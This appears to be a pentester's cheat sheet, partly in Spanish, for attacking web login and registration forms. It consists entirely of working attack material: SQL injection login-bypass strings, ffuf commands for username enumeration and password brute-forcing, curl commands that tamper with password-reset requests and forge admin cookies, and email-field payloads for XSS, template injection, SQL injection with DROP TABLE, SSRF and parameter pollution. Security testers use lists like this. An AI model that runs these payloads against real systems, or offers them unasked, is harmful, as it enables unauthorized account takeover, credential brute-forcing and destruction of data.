admin' --
admin' #
admin' /*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
ffuf -w <wordlist-path> -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/<loginform-path> -mr "username already exists"
Fuzz pass con lista de valid-users:
ffuf -w <valid-usernames.txt>:W1,<wordlist-pass-path>:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/<loginform-path> -fc 200
curl 'http://<IP>/reset?email=<name>%40<URL>' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=<name>&<email=<your-email>'
curl -H 'Cookie: logged_in=true; admin=true' <http://IP/cookie-test>
------------------------------------------------------------------------------------
Payloads en campo Email (Login/register)
test+(<script>alert(hola)</script>)@email.com
test@email(<script>alert(hola)</script>).com
"<script>alert(hola)</script>"@email.com
"<%= 7 * 7 %>"@email.com
test+(${{7*7}})email.com
" ' OR 1=1 -- '"@email.com
"mail'); DROP TABLE users;--"@email.com
false.email@abc123.burpcollaborator.net
false.email@[127.0.0.1]
victim&email=attacker@email.com